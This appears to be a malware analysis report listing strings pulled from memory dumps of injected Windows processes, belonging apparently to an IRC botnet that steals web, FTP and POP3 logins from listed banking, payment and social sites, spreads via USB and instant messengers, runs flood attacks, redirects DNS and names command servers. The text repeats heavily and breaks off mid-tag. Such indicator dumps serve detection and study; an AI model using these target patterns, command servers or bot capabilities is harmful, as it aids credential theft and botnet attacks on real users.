%5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.mon
eybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s 
hijacked!</pre>
<b>winlogon.exe_708_rwx_014A0000_0004E000:</b>
<b>services.exe_752_rwx_00E30000_0004E000:</b>
<b>svchost.exe_948_rwx_009F0000_0004E000:</b>
<b>svchost.exe_1016_rwx_00AD0000_0004E000:</b><pre>*.mon
eybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s 
hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread 
interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 
767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1100_rwx_02340000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL05</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked 
"%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*
uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d 
logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK 
%s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\System32\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 
%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1148_rwx_007F0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s 
(p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><p
